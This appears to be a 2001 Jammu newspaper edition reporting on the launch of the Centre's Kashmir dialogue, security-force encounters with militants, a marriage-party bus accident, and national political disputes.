// Enable debug prints to serial monitor #define MY_DEBUG // Enable and select radio type attached #define MY_RADIO_RF24 //#define MY_RADIO_NRF5_ESB //#define MY_RADIO_RFM69 //#define MY_RADIO_RFM95 // Enabled repeater feature for this node #define MY_REPEATER_FEATURE #define MY_INDICATION_HANDLER static uint32_t txOK = 0; static uint32_t txERR = 0; #define REPORT_INTERVAL 300000 // Report every 5 minutes #define CHILD_ID_TX_OK 1 #define CHILD_ID_TX_ERR 2 #include <MySensors.h> MyMessage txOKmsg(CHILD_ID_TX_OK, V_KWH); MyMessage txERRmsg(CHILD_ID_TX_ERR, V_KWH); void indication(indication_t ind) { switch (ind) { case INDICATION_TX: txOK++; break; case INDICATION_ERR_TX: txERR++; break; } } void setup() { } void presentation() { //Send the sensor node sketch version information to the gateway sendSketchInfo(F("Repeater Node"), F("1.0")); present(CHILD_ID_TX_OK, S_POWER); present(CHILD_ID_TX_ERR, S_POWER); } void loop() { static unsigned long last_send = 0; if (millis() - last_send > REPORT_INTERVAL) { send(txOKmsg.set(txOK)); send(txERRmsg.set(txERR)); last_send=millis(); } }
The same could probably be added to any gateway sketch.
@mfalkvidd - appreciate you time here, should have taken me hours and hours!
@sundberg84 you're welcome. I'm trying to add the feature to one of my gateways now (I don't have any repeaters).
@mfalkvidd I won't sleep tonight now! - Can't wait to see how it works out in the 'real world' for you....
@skywatch so far it is not showing anything interesting. On the other hand, I don't think my GW will transmit anything (no nodes request anything from the controller). This is what it looks like in Domoticz:
I'll let it run overnight, will post an update tomorrow.
As expected, there have been no errors recorded. The number of TX OK per hour is constant.
Domoticz log file shows that the gateway reports every 5 minutes.
Maybe the gateway should look at INDICATION_GW_TX.
@mfalkvidd - INDICATION_GW_TX sounds like a good plan. This is a great tool I think for the future to evaluate and debug your network. I used S_CUSTOM and a utility meter (hourly) in HA to get the values.
Just started up, first values in - will report back when I have more data:
No errors so far
Just so I understand: case INDICATION_ERR_TX: means NACK ?
@sundberg84 I think so. (I've cut out some code for brevity)
const bool result = transportSendWrite(route, message); #if !defined(MY_GATEWAY_FEATURE) // update counter if (route == _transportConfig.parentNodeId) { if (!result) { setIndication(INDICATION_ERR_TX); _transportSM.failedUplinkTransmissions++; } else { _transportSM.failedUplinkTransmissions = 0u; } } #else if(!result) { setIndication(INDICATION_ERR_TX); } #endif
/** * @brief Send message to recipient * @param to Recipient of message * @param message * @return true if message sent successfully */
I guess we could use _transportSM.failedUplinkTransmissions instead of using our own counter.
@mfalkvidd said in Handling NACKs:
I guess we could use _transportSM.failedUplinkTransmissions instead of using our own counter.
That one is reset when a message is sent successfully, and we want to know the total number of failed msgs right?
Something strange happened last hour:
But atleast now I know something is up.
@sundberg84 said in Handling NACKs:
Something strange happened last hour:
@sundberg84 - OMG, I have sat through whole flims with less suspense than this thread! ......
@sundberg84 that's a very nice visual representation. Could you share how you set that up in HA?
@mfalkvidd - its accually Grafana and Influx database. So HA sends values to Influx which are visually presented in Grafana. Im sure you can do this from Domoticz as well... there are some limitations in Influx db so I might change to another database in the future which suits me better.
@sundberg84 sorry for going off topic, but what limitations have you experienced?
I've been thinking about using something better than Domoticz for a long time. Maybe Grafana is the way to go.
- BearWithBeard last edited by BearWithBeard
@mfalkvidd Domoticz is a full-blown home automation system, isn't it? Grafana is just a monitoring dashboard that pulls data from a time-series database (like InfluxDB) and generates fancy graphs. It can't automate and control things or send commands other than alarms (eg. if a value exceeds a threshold, or no new data came in since x minutes, send an email).
One of InfluxDBs limitations is that you can't use (or only some basic) math operations on db queries, which may limit what you can graph in Grafana. Also, changing data types of existing fields in measurements is also not possible, which is annoying, because Grafana treats values differently based on their data type. @sundberg84 can probably name more limitations. I'd love to switch to Carbon / Graphite for data collection and storage... if only it wouldn't take time to read up, setup and migrate all the data.
By the way - great idea to use the indication handler to log radio reliability!
Definitely going to implement this on my
gatewaysrepeaters when I find the time.
@mfalkvidd - @BearWithBeard said it. The limitations are mostly math related. For example, you cant show a graph with current and last years values (timeshift) on the same graph due to that limitation in InfluxDB. I want to compare power usage this day to same day last year - not possible. Im looking to change to Graphite as well instead of Influx.
Moving from Domoticz to HA was a great move for me, but not as i thought. Im using HA more or less just as an umbrella. I would say im using only the OS Hass.IO and not using Home Assistant that much. Whats good in Home Assistant is that its quite easy to integrate different protocolls like MySensors or whatever you use. But after that I dont use Home Assistant but the great possibilities to have add-ons on Hass.IO. I use Node Red for all my automations (Extremly easy compared to code!), Influx + Grafana for visual, motionEyeOs for camera secutiry and more... all you have to do is install the addon from the "store" and you are more or less ready to go. These addons im sure you can install with domoticz as well if you like the integrations with the different protocolls there.
i think we have handeled the NACK questions so no worries for me if we go off topic, but if you rather like send me a dm.
I just love this idea. Implemented the code on my second now, one to go.
@sundberg84 very nice. I'm happy we were able to implement it with so little effort. What does your graph look like now?
Mine is very boring, as I suspected. Don't have any outgoing traffic from my GW. Will have to add it to my nodes to get any useful data.
@mfalkvidd i didnt fins time yet to implement more. But very good for two repeaters.
- alowhum Plugin Developer last edited by
Very cool stuff.
@mfalkvidd Would it be possible to create the functionality, but to measure the successrate of outgoing messages from the gateway node?
For example, I'l love to be able to see how often the controller/gateway tries to toggle a distant node, but fails.
- alowhum Plugin Developer last edited by
Ah, now I see. Thanks! | https://forum.mysensors.org/topic/10947/handling-nacks/33?lang=en-US | CC-MAIN-2020-24 | refinedweb | 2,423 | 65.42 |
form_field(3x) form_field(3x)
form_field - make and break connections between fields and forms
#include <form.h> int set_form_fields(FORM *form, FIELD **fields); FIELD **form_fields(const FORM *form); int field_count(const FORM *form); int move_field(FIELD *field, int frow, int fcol);- nected) to a specified location on the screen.
The function form_fields returns a pointer (which may be NULL). It does not set errno. The function field_count returns ERR if the form parameter is NULL. The functions set_form_fields and move_field return one of the follow- ing codes on error: E_OK The routine succeeded. E_BAD_ARGUMENT Routine detected an incorrect or out-of-range argument. E_CONNECTED The field is already connected to a form. E_POSTED The form is already posted. E_SYSTEM_ERROR System error occurred (see errno(3)).
curses(3x), form(3x).
The header file <form.h> automatically includes the header file <curses.h>.
These routines emulate the System V forms library. They were not sup- ported on Version 7 or BSD versions. The SVr4 forms library documentation specifies the field_count error value as -1 (which is the value of ERR).
Juergen Pfeifer. Manual pages and adaptation for new curses by Eric S. Raymond. form_field(3x) | https://ncurses.scripts.mit.edu/?p=ncurses.git;a=blob_plain;f=doc/html/man/form_field.3x.html;hb=47d2fb4537d9ad5bb14f4810561a327930ca4280 | CC-MAIN-2021-39 | refinedweb | 192 | 51.75 |
#include "femtoos_code.h"
Include dependency graph for code_TestHelloWorld.c:
Go to the source code of this file.
Prototype for the general initialization.
This is the first application code called. It is called only after a reset, thus in principle once.
Definition at line 44 of file code_TestHelloWorld.c.
Definition at line 52 of file code_TestHelloWorld.c.
References portFlashReadByte, speed, taskDelayFromNow(), Tchar, Tuint08, and Tuint16.
Here is the call graph for this function:
Definition at line 71 of file code_TestHelloWorld.c.
References speed, taskDelayFromNow(), and Tuint08.
Here is the call graph for this function:
Definition at line 42 of file code_TestHelloWorld.c.
This file is solely for demonstration purposes.
The Hello World example is made to get you started and this is the file you want to play with. Do not use other examples to that end, that will be a disappointing experience (or a steep learning curve)
Explanation on the website, point your browser at:
Definition at line 40 of file code_TestHelloWorld.c.
Referenced by appLoop_Display(), and appLoop_Speed(). | http://femtoos.org/doxy/code__TestHelloWorld_8c.html | CC-MAIN-2018-26 | refinedweb | 168 | 60.61 |
20 parties
called for first round of negotiations
Pant
begins talks on Kashmir; invites Hurriyat for dialogue
Involvement of Lashkar, JeM outfits ruled out
Doors not closed for HM, other local groups
NEW
DELHI, Apr 15:
The dialogue process on Kashmir began today, with the
Centres negotiator, Mr K C Pant, holding indepth
talks with octogenarian leader Syed Mir Qasim and sending
out formal invitations to leaders of the Hurriyat
Conference and 20-odd political groups to evolve a common
approach on the resolution of the issue.
Mr Pant held one-to-one
meeting with the former Chief Minister, who was briefly
involved in bringing various separatist groups to the
negotiating table late last year but could not play any
major role due to ill-health and lack of response from
the political entities.
The frail-looking Qasim,
during whose tenure prominent Hurriyat leader Abdul Ghani
Lone was a minister and hardliner Syed Ali Shah Geelani
was a legislator, had made some initial moves to probe
the mind of separatist groups some time back without
achieving the desired success.
Addressing a press
conference, Mr Pant said he was ready to discuss all
issues with the Hurriyat, including their proposed visit
to Pakistan for talks with the military regime and
militant groups. But he made it abundantly clear that
there was no scope of talking to Pakistan-based militant
group Lashkar-e-Toiba and Jaish-Mohammed which were
responsible for spreading terror in the Valley.
However, doors were not
closed for Kashmiri organisations, currently engaged in
militancy in the State but desirous of peace. This was
indication for involving Hizbul Mujahideen, an indigenous
militant group, in the talks in the future.
In the first round of
talks, Mr Pant will cover mainly nationalist parties,
besides some separatist groups like Peoples Front of
Shabir Shah.
Asked about the agenda
for the talks, he said it was unconditional. tomorrow, has been postponed
by a few days due to the death of the daughter of Syed
Ali Shah Geelani.
Mr Pant said the talks
were a serious effort and it should not be trivialised.
"I dont, Mr, Mr Pant will meet the leaders of the National
Conference, the Congress, the BJP, the BSP, Left Parties,
Peoples Democratic Party, Panthers Party, Ladakh
Autonomous Hill Council, Imam Khomeini Trust of Kargil,
Awami League and Awami Conference, Islamia group and
others. Mr G M Shah, former Chief Minister and president
of the Awami National Conference, has also been invited.
In his letter to the
political parties, Mr Pant said in order to find
permanent peace in the State it was the responsibility of
"all of us who are genuinely interested in ending
the strife and suffering of the people" to join the
talks.
"I take this
opportunity to invite you for a discussion. I am asking
my office to contact you to fix a mutually convenient
date and time for a meeting."
Mr Pant said he had
been closely associated with Kashmir during Mrs Indira
Gandhis regime. The 12 years of militancy had
played havoc with the economy, infrastructure and lives
of the people. Tourism had been totally ruined and people
continued to suffer. There was need for a sincere effort
to resolve the problem.
"It was for this
reason that the Government had decided to embark upon a
political dialogue with all sections of the people,
including those who were currently outside. It was our
desire to restore peace and normalcy in the State and
people should come forward to participate in the
dialogue," he said.
He said the APHC had all
along taken the position that the talks should be
unconditional and the Government responded positively.
"It is for APHC to consider whether it would not be
inconsistent for them to set conditions for the
dialogue."
On his brief discussion
with Mr Mir Qasim, he said he was a respectable leader
who had played a very important role in the State
politics.
Mr Pant confirmed that
Nationalist Congress Party leader, Sharad Pawar, who met
Kashmiri leaders during his several visits to the State,
briefed him (Pant) about the talks. (UNI)
Invitation to peace
talks is open to all groups
Hurriyat's
boycott would be at its own peril: CM
Excelsior Correspondent
SRINAGAR,
Apr 15: Chief
Minister, Dr Farooq Abdullah has said the invitation for
talks by the Centre was open to every one and the
Hurriyat Conference would boycott the peace process only
at its own peril.
"The APHC would be
eliminated if it does not join the talks", Dr
Abdullah told media persons at the inauguration of a
water reservoir and pump house on the Doodhganga water
supply scheme here today. He said the Centre has invited
all Kashmiri groups for talks including the Hurriyat
Conference and if APHC chose to remain away from the
process it would be isolated as in 1996 elections.
Asked about the
situation in the State, he said good developments were
taking place and referred to the nomination by the Centre
of the Deputy Chairman, Planning Commissioner, Mr K C
Pant for holding talks with various groups in Kashmir to
resolve the present turmoil. He hoped that all groups and
political parties would join the talks to find a way out
of the current different situation. He said his party
would meet Mr Pant and put forward its point of view but
did not elaborate on the demand it would be making.
"It would be decided by the party", he replied
when a reporter asked him to say about his demand.
In reply to a question on
Fidayeen attacks, he said despite these incidents the
situation was better than before "These
people", he said, have been here for many years now
and efforts were on to hunt them". He declined to
specify the strategy for dealing with this situation but
said that a strategy is always there.
He said Pakistan by
silencing her guns on the border had accepted the
unilateral cease-fire but sending of armed men also would
have to be stopped by her to let the peace a chance here.
"Border is much better but the tran border terrorism
has to be stopped by Pakistan", he said.
The Chief Minister set at
rest speculations about Mr Sharad Pawar's recent visit to
the Valley and said he had come here on a boliday with
his family including his daughter and grand daughter. He
said the visit would help in sending a good signal to
intending tourists who might have second thoughts about
the security situation in the Valley. He said this would
convey that the situation in Kashmir was not as bad as
painted by the press.
Dr Abdullah expressed
his dismay over insufficient finances provided by the
Centre saying against the plan size of Rs 1750 crore last
year, the State was provided only Rs 1050 crore. He said
the State needs liberal funding for reconstruction and
development work. "Roads, bridges, schools and
health centres have to be built for which we neet a lot
of money", he said and hoped the Centre would
realise this and provide enough funds.
Later, addressing a public
meeting at Kralpora, the site of the inaugurated water
reservoir, the Chief Minister said despite impediments
and consraints, the development process was on. He said
the reconstruction of the damaged infrastructure was a
gigantic tast that was being carried out with commitment.
He referred to the scarcity of water following continuous
drought like situation and appealed people to make
judicious use of water and power. He said time was not
far away when battles would be fought among nations over
water rather than territory.
The Chief Minister asked
people to pay for the services provided to them by the
Government. He said the State's annual power bill on
import of electricity was a whopping Rs 1000 crore
against which the revenue was only Rs 300 crore. He said
if the State was not in a position to clear its
outstanding the northern grid would snap electric supply.
He said apart from the huge annual power bill, the State
owes Rs 600 crore to the northern grid on account of
earlier outstanding. He said unless people help
themselves nobody would help them out of the present
situation.
Dr Abdullah asked people
not to pay any heed to those who were misleading them in
the name of the so called Azadi. He said Kashmir would
neither attain freedom nor become a part of Pakistan.
"We have to fight for out rights within India",
he said.
Speaking on the
occasion, the Works Minister, Mr Ali Muhammad Sagar said
some elements were out to vitiate the atmosphere and put
the masses to inconvenience and trouble. He said whatever
be the difficulties the development works would go on.
The vested interests that do not want peace and
prosperity to return would have to ultimately eat a
humble pie, he said adding that the yearning for peace
among people was becoming more and more pronounced.
Mr Sagar asked people to
monitor the development works and ensure that quality
material was used in construction works. He said the
Government was doing its best to provide succor to people
but it was also their duty to see that things were done
in good faith. He assured the local people that their
problems would be looked into and solved.
The Minister said the
Kralpora Bridge whose foundation stone was laid by the
Chief Minister today was a long pending demand of the
people. He said the bridge would cost Rs 1.5 crore and
would be ready by December 5 this year. He said the under
construction Rs 1.5 crore Kanidar Water Supply Sheme
would be completed this year.
Delhi alerts security
forces
Pak-aided
ultras want exodus of minorities in J&K
From B L Kak
JAMMU,
Apr 15: The
Union Home Ministry has called for tough action against
anti-India subversives and terrorists who are under
"fresh" orders from across the border to
engineer exodus of the members of a particular community
from some areas in the sensitive districts of Doda,
Poonch, Rajouri and Udhampur in the Jammu region.
Official instructions, in
this regard, have come at a time when Government sleuths
came across evidence in the beginning of this week
vis-a-vis the plan to trigger menacing terrorist
violence, which can result in the exodus of members of
Hindu community from some areas of the Jammu province,
particularly the Doda region.
One of the classified
intelligence inputs made available in Naushera sector has
revealed that the Lashkar-e-Toiba and
Harkat-ul-Mujahideen have been directed to increase the
level of anti-India violence by resorting to firing and
use of highly improvised explosive devices (IEDs) against
India security forces and J&K Police personnel in the
State.
A top Government source
told EXCELSIOR that considering the fact that
Pakistan-aided jihadi elements had planned to intensify
attacks on the Indian Army and paramilitary personnel as
well as their camps and vital defence installations, the
J&K administration as well as security forces plus
intelligence agencies across the State "have been
told in unmistakable terms that containment of insurgency
is the first task".
Why does the Kashmir
policy tend most of the time to be groping for a way
around the problem? The Government source replied:
"Our policy is to ensure that the peace process
initiated in November last is not derailed or misused. It
is not ad hoc in nature at all".
According to the source,
even as the Prime Minister, Mr Atal Behari Vajpayee, and
the Home Minister, Mr L K Advani, have appreciated the
J&K Chief Ministers initiative to revitalise
the State police force, Dr Farooq Abdullah has been told
by both of them that the National Conference Government
has to act more vigorously and in "far greater
systematic manner than till now" for ensuring a
significant reduction in levels of militancy,
intensifying the measures already taken and improving
upon them using more sophisticated means for this
purpose.
The source divulged
that the Centre was studying Dr Farooqs proposal
seeking foreign investment in Jammu and Kashmir. The
source also divulged that Mr Vajpayee and Mr Advani had a
basis when they recently told the J&K Chief Minister
that primacy had to be given to the economic
transformation of the State. This would help remove quite
a few grievances relating to educated unemployment and
jobs for youth and bring down levels of alienation.
At a time when traditional
eclectic Islam in the Valley seems to have received a
heavy battering from fundamentalist pro-Pakistan
elements, the Government of Indias message to the
J&K Government calling for its attention to the
dangers to the Kashmiri way of life assumes significance.
In fact, the Union Home
Minister wants the J&K administration, particularly
the Chief Minister, to ensure that ultra-orthodox
pro-Taliban forces failed to impose their diktat, through
Lashkar-e-Toiba and Harkat-ul-Mujahideen, over local
lifestyles, dress codes etc.
40 of marriage party injured
JAMMU,
Apr 15: Fourty
persons including five children of a marriage party were
injured, two of them critically, when a bus in which they
were travelling fell into Ranbir canal at Baba-Da-Talab
this afternoon.
According to police, the
ill-fated bus bearing registration number JKU-7660
carrying 40 persons of a marriage party was on its way
from Dhangu Chowk, Pathankot to Akhnoor when it met with
accident at Baba-Da-Talab under the jurisdiction of
Kanachak police station.
The driver of the vehicle,
according to eye-witnesses, in an attempt to save his
speeding vehicle from being collided with the Army
vehicle coming from the opposite direction lost control
over the steering resulting into bus collided with a
stationary truck bearing registration number JK02F-5882.
After the collision both
the truck and bus fell into the Ranbir canal causing
grievous injuries to all the passengers including driver
of the bus.
Getting the report of
accident, a police party from Kanachak police station
rushed to the spot and started rescue operation with the
help of villagers. All the injured were brought out of
the vehicle and shifted to Government Medical College
Hospital where condition of two of them was stated to be
critical.
The injured have been
identified as Ladu Ram of Mukerian, Raju, wife of Baldev,
Prem Chand, Ratna Devi, wife of Gian Chand, Raj Kumari,
daughter of Bachan Lal, Rajni, daughter of Tarsem Lal,
Pawan Kumar, son of Sain Dass, Soma Devi, daughter of
Bachan Lal, Ashok, son of Sham Lal, Kanta Devi, wife of
Ashok Kumar, Ekta, wife of Sham Lal, Bachan Lal, son of
Parshotam Lal, Rani Devi, Bimla Devi, wife of Om Parkash,
Joginder Pal, son of Tej Ram, Shama Devi, wife of Baldev
Raj, Baldev, son of Shanker Dass, Raj Kumar, son of
Bishamber Dass, Kanta Devi, wife of Garu Ram, Jyoti Devi,
wife of Kashmiri Lal, Tarsem Lal, son of Thoru Ram, all
the residents of Pathankote and Kamlesh Kumari, wife of
Babu Ram of Muthi, Jammu.
The condition of Prem
Chand of Pathankote and Kamlesh Kumari of Muthi, Jammu
was stated to be critical till reports last came in.
Kashmir peace process on right
track: Advani
ON
BOARD SPECIAL BSF AIRCRAFT, Apr 15: Asserting that the Jammu and
Kashmir peace process was on the "right track,"
the Centre today said it was for Hurriyat Conference to
respond to the Governments invitation for talks.
"Hurriyat Conference
will also be invited. It is upto them to decide how to
respond," Union Home Minister L K Advani told
reporters while returning from Ravapar in Gujarat after
inaugurating a newly-constructed village.
Asked about rejection of
talks offer by various militant groups, he said "I
dont comment on "ad hoc things. After all,
they are also having discussions," he said.
Terming as a significant
development naming of K C Pant as the principal
interlocutor to hold talks with various political and
other groups in J and K, Advani said all sections of the
State, including Congress, National Conference, Kashmiri
Pandits and representatives of Ladakh and Jammu would be
invited to talks.
Advani said two other
significant developments after the announcement of peace
initiatives in Jammu and Kashmir were the statement of UN
secretary general Kofi Annan rejecting implementation of
UN resolutions on Kashmir and Indian Governments
decision to go ahead with fencing of International Border
in Jammu and Kashmir.
"Government even
while pursuing the path of peace, is very much concerned
about security," the Home Minister said adding the
international opinion had significantly altered
post-Kargil.
Referring to the recent US
visit by External Affairs Minister Jaswant Singh, Advani
said although "I have had no occasion to discuss
with him in detail about the talks in Washington, he
briefly told me these were very satisfactory."
On border fencing, he said
despite Pakistans protest, the Government decided
to resume fencing on 200 km stretch of international
border from Jammu to Kathua which "we had been
considering since coming to power."
He said since the fencing
along the border in Punjab and Rajasthan had been helpful
in checking infiltration and smuggling, similar results
are expected in Jammu and Kashmir.
On the possibility of
another extension to ceasefire in Jammu and Kashmir, he
said the decision is taken by the Cabinet Committee on
Security when the time comes. (PTI)
HM commander
shot dead
3
BSF jawans killed; 3 injured in Mahore
UDHAMPUR,
Apr 15: The
Border Security Force (BSF) suffered a major setback in
its anti-militancy operations when it lost three BSF
jawans while three others got seriously injured in an
ambush laid by the militants at Thapral Top in Mahore
tehsil this evening.
A Hizbul Mujahideen
commander was also killed in the retaliatory
firing by BSF.
Official reports reaching
here said that a patrol party of BSF was ambushed by a
big group of militants, numbering between eight to 10,
from atop a hill in Thapral Top this evening. The
security jawans were carrying out a routine patrolling in
the area when the militants resorted to indiscriminate
firing and launched grenade attacks on them.
As the militants had taken
advantageous positions on the hills, the succeeded in
causing serious bullet injuries to six jawans. Despite
being injured, the jawans fired back and eliminated a
commander of the group, who was leading the
militants.
Additional force of BSF
rushed to the spot immediately. However, by then, three
injured BSF jawans had succumbed to their wounds. Three
other injured jawans were airlifted to Udhampur and
admitted in the Command Hospital. Their condition was
also stated to be critical.
The slain militant has
been identified as Hafiz Syed alias Gul Abbas, hailing
from Lahore in Pakistan. He was a hardcore militant of
Hizbul Mujahideen outfit and was commanding the group,
which attacked BSF patrol party.
One AK-56 rifle with three
magazines and 31 rounds, one wireless set and a hand
grenade were recovered from the possession of Gul Abbas.
Other militants managed to escape from the encounter
site.
Three deceased BSF jawans
have been identified as Havildar Mohan Jha, and
constables Rajinder Parsad and Sita Ram. Their bodies
will be flown to their native towns tomorrow morning.
BSF have cordoned off
Thapral Top from all four sides and launched a massive
operation to kill the militants involved in laying
ambush.
Our Rajouri
correspondent adds: A civilian and an army jawan were
injured in an encounter with the militants at village
Khablan under the jurisdiction of Thanna Mandi police
station this afternoon.
The injured civilian has
been identified as Mohd Din. He was trapped in the
exchange of firing between army and militants and got
injured. He has been hospitalised.
After about an hour long
gun-fight, the militants managed to escape. Troops were
trying to chase and eliminate the militants.
In another incident, a
Village Defence Committee (VDC) member fired a shot in
air in village Jamola near Rajouri this morning. No one
was injured in the shoot-out.
Big success by STF Doda,
RR
4
top Jaish militants gunned down in Warwan
JAMMU,
Apr 15: Four
hitmen of Azhar Masoods Jaish-e-Mohammed outfit
including a district commander Hamid
Kishtwari were killed in an encounter with Special Task
Force (STF) and Rashtriya Rifles in remote area of
Warwan, ahead of Marwah, in Kishtwar tehsil of Doda
district this morning.
Three militants of the
same group had been shot dead by the same forces few days
back in Marwah area. The four militants killed today had
managed to escape from Marwah encounter and took shelter
in Warwan forests.
SSP Doda Ashkoor Wani,
when contacted, told EXCELSIOR on telephone from Doda
that jawans of STF with the back-up of 11 Rashtriya
Rifles were continuing searches in Warwan, the last
village of Doda bordering Zanskar in Ladakh, following
reports that four militants, who had escaped during an
encounter in Marwah three days back, had fled to Warwan
and taken shelter there in a forest area.
STF and army jawans
continued massive searches in Warwan for the last two
days and finally succeeded in locating the militants in
one of the dense forest, Security personnel asked the
militants to lay down their arms and surrender.
However, two militants
started running in an opposite direction while two other
opened firing on police and army soldiers, who fired back
in self defence. A fierce exchange of gun-fighting ensued
between the two sides at about 0700 hours today and
continued for four hours.
STF and Rashtriya Rifles
jawans succeeded in eliminating all four dreaded
militants. One STF jawan sustained minor injuries in the
operation. His condition was stated to be out of
danger.
Official sources said
bodies of all four slain militants have been recovered
from the scene of encounter. One of them was later
identified as Hamid Kishtwari, a district
commander of Jaish-e-Mohammed. Identity of
Kishtwaris three associates couldnt be
established as they were not carrying any identity card
with them. All of them were foreign mercenaries, hailing
from Pakistan and Afghanistan.
Four AK-56 rifles, 25
magazines, 340 rounds, two wireless sets, 22 grenades,
explosive devices and other ammunition were recovered
from the possession of killed militants.
Sources said with the
elimination of four militants, all seven militants of
Jaish-e-Mohammed group who were active in Warwan and
Marwah, have been killed. With their killings, the people
of remote villages have heaved a sigh of relief.
Infact, the sources said,
these were the local people who had tipped off army and
police regarding presence of the militants in their
areas. The militants used to harass civilians by forcing
them to prepare food for them daily. Besides, the foreign
mercenaries also used to harass the young girls.
SSP holds talks as bandh enters
9th day
UDHAMPUR,
Apr 15: SSP
Udhampur Deepak Kumar left for tense Basantgarh town this
morning where an indefinite bandh and dharna entered into
ninth day today in protest against alleged atrocities on
people by police personnel of a special mobile party
during a search operation.
People of Basantgarh had
been from the very first day of agitation demanding a
visit to the town by a senior police officer like DIG
Udhampur-Doda range Sheikh Owais Ahmed and SSP Udhampur
Deepak Kumar.
Reports reaching here said
the SSP reached Basantgarh late this evening and had
talks with representatives of the people, who had formed
a Joint Action Committee (JAC), which was spearheading
the agitation.
However, details of the
talks couldnt be gathered till late tonight.
Negotiations were expected to resume tomorrow morning in
which the dead-lock was expected to be broken.
Meanwhile, shops remained
closed in Basantgarh for ninth straight day today. An
indefinite dharna also continued in the town, which was
joined by women and children.
As already reported, a
special mobile cell of police had resorted to beating-up
of local people of both communities including women and
children while carrying out searches. Since then, the
people had been observing a complete bandh in Basantgarh
demanding stern action against erring police personnel.
However, no senior police
officers visited the town for nine days forcing the
people to prolong their agitation.
Meanwhile, a bandh was
also observed in Majouri village for third day today
demanding upgradation of middle school upto 9th class.
There was no response to peoples agitation by the
administration.
Vajpayee says he will speak to
Sonia again
LUCKNOW,
Apr 15: A day
after Congress boycotted the all-party meeting called to
resolve the impasse in Parliament over Tehelka issue,
Prime Minister Atal Behari Vajpayee today said he would
speak to Congress president Sonia Gandhi to ensure smooth
functioning of the house when its budget session resumes
tomorrow
Addressing a press
conference at Raj Bhawan here, Vajpayee, appearing
conciliatory, said no probe has been ordered into the
charges levelled by Janata Party president Subramanian
Swamy against Gandhi and her family-members but had, at
the same time, a tough message for Congress saying the
Bofors case was progressing and that party may be in the
dock.
Congress deputy leader in
Lok Sabha Madhavrao Scindia termed as
"unsatisfactory" the explanation given by the
Prime Minister that Government had not ordered any CBI
probe into Swamys charges.
"No CBI probe has
been ordered into Swamys charges against Sonia
Gandhi and only preliminary inquiries are being made to
establish whether there is any need to have it probed by
CBI," he said.
Vajpayee said he had
spoken to Gandhi when he was in Tehran recently and
"I will speak to her again and try to persuade her
to help run Parliament smoothly".
The Congress president, in
her capacity of leader of the opposition, can help in
ensuring smooth proceedings in the Lok Sabha, the Prime
Minister said.
Vajpayee said the case
relating to kickbacks in Bofors gun deal was progressing
and Congress "may find itself in the docks".
"Bofors case Pragati
Par Hai Aur Congress Party Kathghare Mein Khari Ho Sakti
Hai (Bofors case is in progress and Congress may
find itself in the docks)," he said.
Seeking to signal that
Government was not forcing the pace of Bofors case to
counter Tehelka expose, the Prime Minister said "we
are not doing anything from our side but it is just a
coincidence that some corruption cases have started
progressing."
Earlier, addressing an
NDA-sponsored Kisan Rally here, Vajpayee said Congress
and other opposition parties were not prepared to debate
in Parliament the Tehelka expose and "their threat
of a direct fight with the Government will create chaos
and anarchy in the country."
This would start a
wrong trend, he said, adding "if BJP adopts similar
tactics in Congress-ruled states where it is the main
opposition party, what would Congress do?"
Attacking the Congress for
resorting to "undemocratic means" to topple his
Government, Vajpayee dared the opposition to bring a
no-confidence motion and said if his Government failed to
prove majority on the floor of the House, it would quit
as it had done in the past when it lost by only one vote.
Stating that corruption
was a serious issue that needed to be addressed, he said
Congress, unlike BJP, was not in favour of bringing the
Prime Minister under the purview of Lok Pal Bill. (PTI)
Mohsina Kidwai arriving today
JAMMU,
Apr 15: All
India Congress (I) Committee general secretary Mrs
Mohsina Kidwai is arriving here tomorrow morning on her
first visit to the State after taking over the charge of
party affairs in Jammu and Kashmir.
Mrs Kidwai will be
accompanied by PCC (I) president Mohd Shaffi Qureshi.
Centre
should have initiated talks on
Kashmir much earlier
BHOPAL,
Apr 15: The
Centre should have initiated the process of dialogue
immediately after announcing ceasefire in Kashmir three
months back, according to former Sadar-e-Riyasat of Jammu
and Kashmir Dr Karan Singh.
"Initiating talks at
this stage does not have any relevance," Dr Singh,
now a Congress MP, said.
Asked to outline a
solution to the vexed problem, he said "the problem
is very grave and requires to be ameliorated," he,
however, refused to elaborate further.
Dr Singh conceded that the
situation in Kashmir had become grave and complicated
over the last 12 years.
"The escalation in
violence in Kashmir , after Rajiv Gandhi was removed from
power, has continued unabated."
He also expressing concern
over the corruption in the country called for a
revolution. "This revolution should not be violent
but in tune with the Indian society". (UNI)
Netaji died in
Russian cell, says Bodyguard
VIJAYAWADA,
Apr 14: The
bodyguard of Netaji Subhash Chandra Bose, Shobharam
Dokas, today claimed that the great patriot had died in a
Russian Cell and not in an air crash as has been talked
about.
Dokas, who was here to
attend the All India Freedom Fighers National General
Council, told reporters that "Netaji is not alive.
Even if he is alive, his age would be 104 and chances for
his survival are very rare."
"Bose, who recruited
Indian Prisoners of War in the Azad Hind Sena, was a
great leader, who believed in sacrificing everything for
the freedom of the nation," Dokas said.
He said "during the
course of freedom struggle, he left from Bangkok to
Russia via Mangolia and was later went missing. Though I
was his bodyguard, due to certain reasons I could not
accompany him as I was made incharge of an area during
the freedom struggle."
"We, as freedom
fighters, are vexed with the present murky politics.
Corruption has raised its head in every sphere. We have
decided to create awareness among the people about the
present political, economic and social scenario," he
added.(PTI)
TC should nt have pulled
out of NDA: Panja
KOLKATA,
Apr 14:
Trinamool Congress (TC) MP Ranjit Kumar Panja today said
the TC-BJP alliance would have had a smooth sailing in
the coming West Bengal Assembly polls had TC persisted
with the NDA.
Describing the decision of
TC chief Mamata Banerjee to pull out of the NDA as
abrupt, Panja said it would now be
difficult to convince voters of the new
TC-Congress alliance in the elections.
"As we had been
opposing the Congress all along it may be difficult for
us to convince the ordinary voters, if not the
enlightened ones, about the alliance," he told PTI
here.
Panja said he also had
reservations about selection of party candidates for the
coming polls in his Barasat Lok Sabha constituency.
"I had indicated my
preferences, based on the prospects of each nominee. But
in most seats those ranked lower in the order have been
given tickets".
However, Panja scotched
speculation about his joining the BJP, saying "such
theories have no substance"..
Panja, a noted
dermatologist who had been elected twice consecutively
from the north 24 Pargans, constituency, said "I am
not out and out a politician. If I have ideological
differences with my party, I have the option of quitting
politics.
However, Panja hastened to
add that in such a scenario he would first hold
discussions with Banerjee.
Meanwhile, the Left Front
today alleged that Trinamool Congress (TC) was still
keeping its contact with the BJP led National Democratic
Alliance (NDA) and was keeping its option open.
"Even though two of
the TC Ministers have tendered their resignation from the
NDA Government, the party has not yet informed the
President if they had withdrawn their support to
NDA," State CPI(M) secretary Anil Biswas told
reporters here.
Biswas said Trinamool
Congress had not written to the President any letter in
this regard as it wanted to keep their options open to
take a step suitable to them after the assembly elections
in West Bengal was over.
